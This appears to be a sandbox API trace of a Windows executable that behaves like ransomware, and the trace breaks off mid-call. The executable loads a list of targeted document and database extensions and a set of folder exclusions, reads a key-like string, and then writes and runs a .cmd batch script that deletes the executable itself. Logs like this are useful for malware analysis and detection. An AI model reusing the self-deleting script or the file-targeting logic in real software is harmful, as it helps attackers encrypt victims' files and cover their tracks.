[0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, 
lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0117.153] LoadResource 
(hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0117.153] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0117.153] LockResource (hResData=0x516f58) returned 0x516f58 [0117.153] FreeResource (hResData=0x516f58) returned 0 [0117.153] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.153] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.153] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.153] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6350b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6350b0, cbMultiByte=38, lpWideCharStr=0x62de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.153] FreeResource (hResData=0x50d64c) returned 0 [0117.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x6350b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5c4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x5c4258, cbMultiByte=97, lpWideCharStr=0x592ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0117.153] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0117.153] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0117.154] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0117.154] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0117.154] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x610df0, dwCreationFlags=0x4, lpThreadId=0x62dd84 | out: lpThreadId=0x62dd84*=0xe94) returned 0xb8 [0117.154] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0117.154] ResumeThread (hThread=0xb8) returned 0x1 [0117.154] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0117.497] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.497] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0117.497] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0117.497] SizeofResource (hModule=0x400000, 
hResInfo=0x51c510) returned 0x53 [0117.497] LockResource (hResData=0x5187d4) returned 0x5187d4 [0117.497] FreeResource (hResData=0x5187d4) returned 0 [0117.497] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.497] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.497] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.497] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635120, cbMultiByte=38, lpWideCharStr=0x62df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.497] FreeResource (hResData=0x50d64c) returned 0 [0117.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x635124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.498] GetCurrentThreadId () returned 0xe60 [0117.498] GetCurrentThreadId () returned 0xe60 [0117.498] GetCurrentThreadId () returned 0xe60 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x62de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x62de48, cbMultiByte=83, lpWideCharStr=0x5c012c, cchWideChar=83 | out: 
lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0117.498] GetTickCount () returned 0x27e05 [0117.498] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=17428689712) returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="W畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="l畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="L畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="s畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="o畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="r畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="5畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="U畔﮴\x12\x1c翻") returned 1 [0117.498] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0117.498] CharUpperBuffW (in: 
lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0117.498] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", lpszShortPath=0x5cc65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe") returned 0x30 [0117.498] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0117.498] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0117.498] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0117.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x5afbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0117.499] WriteFile (in: hFile=0xe8, lpBuffer=0x5afbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x5afbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0117.500] CloseHandle (hObject=0xe8) returned 1 [0117.501] GetCurrentThreadId () returned 0xe60 [0117.501] GetCurrentThreadId () returned 0xe60 [0117.501] GetCurrentThreadId () returned 0xe60 [0117.501] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xec8, dwThreadId=0xecc)) returned 1 [0117.508] CloseHandle (hObject=0xec) returned 1 [0117.508] CloseHandle (hObject=0xe8) returned 1 [0117.508] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" 
[0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] GetCurrentThreadId () returned 0xe60 [0117.509] WSACleanup () returned 0 [0117.692] FreeLibrary (hLibModule=0x77380000) returned 1 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentProcess () returned 0xffffffff [0117.692] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0117.692] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, 
AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] ResetEvent (hEvent=0x88) returned 1 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] ResetEvent (hEvent=0x88) returned 1 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.692] GetCurrentThreadId () returned 0xe60 [0117.693] CloseHandle (hObject=0x88) returned 1 [0117.693] CloseHandle (hObject=0x8c) returned 1 [0117.693] CloseHandle (hObject=0x84) returned 1 [0117.693] GetCurrentThreadId () returned 0xe60 [0117.693] GetCurrentThreadId () returned 0xe60 [0117.693] GetCurrentThreadId () returned 0xe60 [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1d, wMilliseconds=0x35d)) [0117.693] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, 